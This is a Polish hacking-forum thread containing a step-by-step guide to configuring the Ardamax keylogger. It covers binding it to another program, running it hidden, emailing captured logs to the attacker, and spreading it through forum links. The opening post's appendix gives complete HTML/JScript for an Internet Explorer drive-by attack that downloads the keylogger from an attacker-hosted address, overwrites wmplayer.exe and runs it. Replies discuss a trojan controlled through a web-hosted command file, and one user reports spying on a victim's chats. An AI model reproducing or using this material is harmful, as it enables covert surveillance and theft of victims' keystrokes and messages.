PORADNIK - Konfiguracja Ardamax keylogger

wiaderko

Użytkownik
Dołączył
Maj 1, 2006
Posty
8
Nie wiem czemu niektorzy maja problemy z konfiguracja tego keyloggera ;s

Tworzymy mejla. Masz juz? Kij mnie to, zakladaj. Wejdz na http://poczta.wp.pl i zaloz tam konto

Pobieramy TO, pozniej TO. Instalacji i rejestracji nie bede opisywac, jesli masz z tym problemy - pisz smialo.

Klikamy PPM na taka ikonke w trayu [jesli nie wiesz co to jest - pisz smialo]

15kw.jpg


Wybieramy Engine Builder

26mm.jpg


Dajemy Dalej. Teraz wazny moment, bindujemy z innym programem.

33wu.jpg


Dalej... Mozna zaznaczyc wedle wlasnych upodoban [jesli nie wiesz co jakie slowo oznacza - http://translate.pl lub pisz smialo]

Dalej... Nic nie zmieniamy, dalej... Znow dalej... Teraz zaznaczamy Start in hidden mode

45be.jpg


Dalej... Ja ustawie aby wysylalo logi tylko na maila.

51qu.jpg


Teraz drugi wazny moment, ustawiamy maila.

61kj.jpg


Gdzie nasz [email protected] to stworzony przez nas mail, smtp.wp.pl to serwer, user to uzytkownik do serwera SMTP, a password to haslo do tego uzytkownika.
Klikamy test. Wchodzimy na http://mini.poczta.wp.pl/ i sprawdzamy czy nie ma tam czegos takiego

75sn.jpg


Jesli jest - cieszymy sie, nie ma - ustawiamy od nowa maila.
Dalej...

Klikamy na Browse i szukamy pulpitu. Jak znajdziemy to dajemy Zapisz i Dalej. Na koniec Zakoncz i masz keyloggera.

Teraz tworzymy jakies konto FTP [moze byc rapidshare, lecz lepiej konto ftp] na np cba.pl. Wrzucamy tam plik i dajemy link na forum, aby zlapac ofiare. Jesli otworzyla go to za 30 min dostaniemy na maila loga.

DODATEK

Dla ofiar ktore korzystaja z IE, nie maja AV i FW, mozna stworzyc exploita. Generujemy serwer tak jak juz to opisalem lecz nie bindujemy go. Zakladamy konto na chociazby cba.pl.

Otwieramy notatnik i piszemy w nim cos takiego:

Kod:
<HTML>

<textarea id="code" style="display:none;">



    var x = new ActiveXObject("Microsoft.XMLHTTP"); 

    x.Open("GET", "ADRES KEYLOGGERA",0); 

    x.Send(); 

    

    var s = new ActiveXObject("ADODB.Stream");

    s.Mode = 3;

    s.Type = 1;

    s.Open();

    s.Write(x.responseBody);



    s.SaveToFile("C:Program FilesWindows Media Playerwmplayer.exe",2);

    location.href = "mms://";



</textarea>

TUTAJ MOŻEMY COŚ DODAĆ [np. Server is extremely busy at this moment. Please wait when server generate mirror for you...]

<script language="javascript">



    function preparecode(code) {

        result = '';

        lines = code.split(/rn/);

        for (i=0;i<lines.length;i++) {

        

            line = lines[i];

            line = line.replace(/^s+/,"");

            line = line.replace(/s+$/,"");

            line = line.replace(/'/g,"'");

            line = line.replace(/[]/g,"");

            line = line.replace(/[/]/g,"%2f");



            if (line != '') {

                result += line + 'rn';

            }

        }

        return result;

    }

    

    function doit() {

        mycode = preparecode(document.all.code.value);

        myURL = "file:javascript:eval('" + mycode + "')";

        window.open(myURL,"_media");

    }

    



    window.open("error.jsp","_media");

    

    setTimeout("doit()", 5000);

    

</script>

<script>function go(){ self.location.href='ADRES STRONY KTORA WYSWIETLI SIE PO ZALADOWANIU KEYLEGGERA [np. wlasnie ten mirror]'; }

setTimeout('go()',10000); </script>

</HTML>

Wypelniamy ten kod i wrzucamy na serwer jako index.html. Dajemy link ofiarze z IE bez AV I FW, a jej keylogger odpali sie samoczynnie.

Pytania? Sugestie? Uwagi? Pisz!

btw.
Przepraszam za powalona cala gramatyke i ortografie, ale pisze to na szybko i nawet do worda nie chce mi sie wrzucic [pierwsza sprawa est to ze go w ogole nie posiadam ;d]
 

d3vil

Były Moderator
Dołączył
Lipiec 25, 2005
Posty
495
Spoko art
smile.gif
Tylko mam pytanie: co ma ten Ardmax czego nie będzie miało VSK w wersji 3.0? -.- Nawet VSK jest darmo, a do tego trzeba ściągać fixa.
 

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
Originally posted by P3rSoFT
Sporo tego napisles =]

Przyda sie

PS: CHCECIE ZEBYM NAPISAL PORADNIK JAK STEROWAC NP: BIG BENEM ZA POMOCĄ KOMORKI? JETSES NA ODLODZI I MOZESZ SIE BAWIC JAK NA KĄPIE=]
JAK CHCECIE TO DAJCIE ZNAC TO Z CHECIĄ NAPISZE =]

Co za problem? wystraczy jakis klient gg na komorke i ot co...
 

P3rSoFT

Użytkownik
Dołączył
Maj 1, 2006
Posty
38
hihi
pytalem sie paru kolesi na gg z forum i nie wiedzieli o takim czyms, wiec moze komos sie przydac. Ze Ty o tym wiesz to sie spodziewalem ;]
 

D0han

Były Moderator
Dołączył
Lipiec 27, 2005
Posty
975
Na takie sterowanie to ja mam jeszcze inny pomysl. Mianowicie skrypt php na serwie zapisujacy do danego pliku polecenia podane mu w GET, i serwer trojana ktory odczytuje ten plik i podejmuje odpowiednie dzialania. Pomysl jest uniwersalny, niezalezny od czasu, polozenia, systemu operacyjnego, jezyku, koloru skory, dlugosci jezyka, rozmiaru buta.

To kto takie cos zrobi? ;]
 

rafal

Były Moderator
Dołączył
Marzec 30, 2005
Posty
392
dla VSK3 robilem taki modul, ale czy bedzie to juz zalezy od Dark'a. Chcialem tez reaktywowac projekt "mass connect" sterowany przez przegladarke... ale jestem za leniwy na to a praktycznie juz wszystko zrobilem (komunikacja program <=> skrypt php)
<
Jedna wada takiego projektu jest to iz zzera to ogromna ilosc transferu, bo ciagle laczenie sie z serwerem , wysylanie, pobieranie i upload plikow to nim sie obejrzysz to konto zablokowane (mowa o darmowych). WIec w sumie moge stworzyc taka pokazowke z kodem w delphi i skryptem i kazdy obcyka sobie , zreszta to nic skomplikowanego ;-)
 

D0han

Były Moderator
Dołączył
Lipiec 27, 2005
Posty
975
Gdzies (na tym forum?) widzialem trojana pracujacego na podobnej zasadzie (tzn pobieral przez http zawartosc pliku txt i wykonywal zadane polecenia). Nie jest to zbyt trudne w implementacji.

Takm czyms mozna sterowac tez przez komorke (wystarczy WAP).
Co do wyczerpania transferu to sie nie zgodze, wyslanie polecenia nie zrzera go (jedynie skrypt wypisujacy bez zadnych HTML text 'OK' albo 'BLAD', co oznacza przeslanie max 8 bajtow ;] ), a pobranie zawartosci pliku przez http to jest dlugosc polecenia pomnozona przez 2 bajtow.
Pobranie polecenia o 15 znakach co 15 sekund przez godzine wynosi 7,03125 megabajta.
Wiec tyle na ten temat: LOL!
 

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
Niedziała

Ten twój niby dodatek niechce mi działać czy ten kod jest napewno dobry?
 

rafal

Były Moderator
Dołączył
Marzec 30, 2005
Posty
392
no ok Dohan, nie chce mi sie tego przeliczac, ale wez pod uwage ze raczej calosc bedzie na jednym serwerze z ktorego korzystaja wszyscy uzytkownicy danego programu a kazda osoba bedzie miec wlasne konto do kontroli tego trojana , takimi mini portal. Dochodza odwiedziny , sprawdzanie czy cos wyslano itd...
 

wiaderko

Użytkownik
Dołączył
Maj 1, 2006
Posty
8
Re: Niedziała

Originally posted by Dark Smark
Ten twój niby dodatek niechce mi działać czy ten kod jest napewno dobry?

Powiem ci ze nie wiem ;< Kod nie jest moj i z niego nie korzystalem.
 

D0han

Były Moderator
Dołączył
Lipiec 27, 2005
Posty
975
@maSs
Hmm, ja mialem na mysli zeby kazdy sam sobie zrobil konto i z niego korzystal, wtedy nie byloby takich przebojow jak np. z mailem ze ktos zakosil i zmienil haslo i nic nie dziala.
Problem mieliby ci ktorzy nie maja dostepu do konta telnet + http + php, ale czy yoyo.pl takich nie rozdaje za free?
 

Gaweł11

Użytkownik
Dołączył
Kwiecień 18, 2006
Posty
8
Keygen

Mam pytanie. Czy key-gen do Ardamaxa jest czysty i nie zawiera "bonusów"? mÓj Antywir nic niewykrył ale nic niewiadomo.
 

wiaderko

Użytkownik
Dołączył
Maj 1, 2006
Posty
8
Re: Keygen

Originally posted by Gaweł11
Mam pytanie. Czy key-gen do Ardamaxa jest czysty i nie zawiera "bonusów"? mÓj Antywir nic niewykrył ale nic niewiadomo.
Nie wiem, w kazdym badz razie mi sie nic nie przytrafilo ; )

>: d
 
Ostatnio edytowane przez moderatora:

Czarna Mamba

Użytkownik
Dołączył
Kwiecień 16, 2006
Posty
15
bardzo fajny poradnik. Spodobało mi sie to z tym ze server keyloggera samo sie wrzuci na kompa tylko tego zabardzo niekapuje bo jestem total nowicjusz
<


to ja mam stworzyc pustom strone z niczym.potem wciepac ją na cba.pl i co dalej?? z teog co ja rozumie to czeeba stworzyc 2 strony
1.adres keyloggera
2.strona ktora sie wyswietli po zaladowaniu keyloggera
mógłby ktoś mi to wytłumaczyć bardziej bo zabardzo nie czaje a teakie cos by mi sie bardzo przydało. :zawstydzony:
z góry dzieki za pomoc.licze na szybkom odpowiedz.gwarantowany punkcik :>
pozdro

(sorki za błędy)
 

Look3r

Użytkownik
Dołączył
Kwiecień 23, 2006
Posty
1
ten kod nie działa ;/ mi wyskakuje błąd, że nie może znaleść error.jsp ???
 

lavey

Użytkownik
Dołączył
Maj 5, 2006
Posty
1
ok, nawet z powodzeniem udało mi się przechwycić to co chciałem (rozmowa na gg:p) i teraz pytanie: jak usunąć to z kompa ofiary jeśli jest już niepotrzebne :nauka:
 

Loleq Zioom

Użytkownik
Dołączył
Marzec 31, 2006
Posty
4
Wszystko ok tylko jak daje ok przy sprawdzaniu meila to wywala blad 533 ze posiadany przez ciebie adres jest nie twoj czy cost takiego ;/
 

karol12

Użytkownik
Dołączył
Maj 6, 2006
Posty
2
elo...mam taki problem ze jak wybieram plik: config.php to nie chce mi znim zblindowac;/....powiedzcie z czym mozna a z czym nie:p
 

FDJ

Były Moderator
Dołączył
Maj 23, 2005
Posty
1044
poszukaj sobie odpowiedzi na to pytanie na forum :/
 
Do góry Bottom